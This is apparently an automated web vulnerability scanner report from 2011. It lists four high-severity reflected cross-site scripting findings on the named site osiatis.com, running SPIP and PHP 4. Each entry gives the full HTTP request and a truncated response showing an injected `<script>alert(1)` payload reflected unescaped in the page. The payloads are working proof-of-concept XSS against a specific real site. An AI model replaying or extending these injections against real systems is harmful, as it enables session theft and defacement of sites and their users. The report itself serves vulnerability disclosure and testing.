1. Cross-site scripting (reflected)
1.1. http://www.osiatis.com/404.php3 [name of an arbitrarily supplied request parameter]
1.2. http://www.osiatis.com/rubrique.php3 [id_rubrique parameter]
1.3. http://www.osiatis.com/rubrique.php3 [id_rubrique parameter]
1.4. http://www.osiatis.com/rubrique.php3 [name of an arbitrarily supplied request parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://www.osiatis.com |
Path: | /404.php3 |
GET /404.php3?3db1d--><script>alert(1)< Host: www.osiatis.com Proxy-Connection: keep-alive Referer: http://www.osiatis.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _jsuid=8828640156315 |
HTTP/1.1 200 OK Date: Wed, 09 Mar 2011 18:07:20 GMT Server: Apache/1.3.33 (Debian GNU/Linux) PHP/4.3.10-22 X-Powered-By: PHP/4.3.10-22 Composed-By: SPIP 1.8.3 @ www.spip.net Vary: Cookie,Accept-Encoding Last-Modified: Wed, 09 Mar 2011 18:07:20 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 29233 <HTML> <HEAD> <META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <TITLE>OSIATIS</TITLE> <LINK href="global.css" rel="stylesheet" type="text/css"> <SCRIPT type="text/JavaScript" s ...[SNIP]... <td>REQUEST_URI : /404.php3?3db1d--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.osiatis.com |
Path: | /rubrique.php3 |
GET /rubrique.php3?id Host: www.osiatis.com Proxy-Connection: keep-alive Referer: http://www.osiatis.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _jsuid=8828640156315 |
HTTP/1.1 200 OK Date: Wed, 09 Mar 2011 18:07:56 GMT Server: Apache/1.3.33 (Debian GNU/Linux) PHP/4.3.10-22 X-Powered-By: PHP/4.3.10-22 Composed-By: SPIP 1.8.3 @ www.spip.net Vary: Cookie,Accept-Encoding Last-Modified: Wed, 09 Mar 2011 18:07:56 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 17172 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <TITLE>OSI ...[SNIP]... <td>REQUEST_URI : /rubrique.php3?id ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.osiatis.com |
Path: | /rubrique.php3 |
GET /rubrique.php3?id Host: www.osiatis.com Proxy-Connection: keep-alive Referer: http://www.osiatis.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _jsuid=8828640156315 |
HTTP/1.1 200 OK Date: Wed, 09 Mar 2011 18:07:52 GMT Server: Apache/1.3.33 (Debian GNU/Linux) PHP/4.3.10-22 X-Powered-By: PHP/4.3.10-22 Composed-By: SPIP 1.8.3 @ www.spip.net Vary: Cookie,Accept-Encoding Last-Modified: Wed, 09 Mar 2011 18:07:52 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 17172 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <TITLE>OSI ...[SNIP]... <A href="#" onClick="ajoutPanier('35258cf\"><ScRiPt>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.osiatis.com |
Path: | /rubrique.php3 |
GET /rubrique.php3?id Host: www.osiatis.com Proxy-Connection: keep-alive Referer: http://www.osiatis.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _jsuid=8828640156315 |
HTTP/1.1 200 OK Date: Wed, 09 Mar 2011 18:07:59 GMT Server: Apache/1.3.33 (Debian GNU/Linux) PHP/4.3.10-22 X-Powered-By: PHP/4.3.10-22 Composed-By: SPIP 1.8.3 @ www.spip.net Vary: Cookie,Accept-Encoding Last-Modified: Wed, 09 Mar 2011 18:07:59 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 142494 <HTML lang="fr"> <HEAD> <META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <TITLE>Outsourcing informatique et certification ITIL - Osiatis : communiqués de pr ...[SNIP]... <td>REQUEST_URI : /rubrique.php3?id ...[SNIP]... |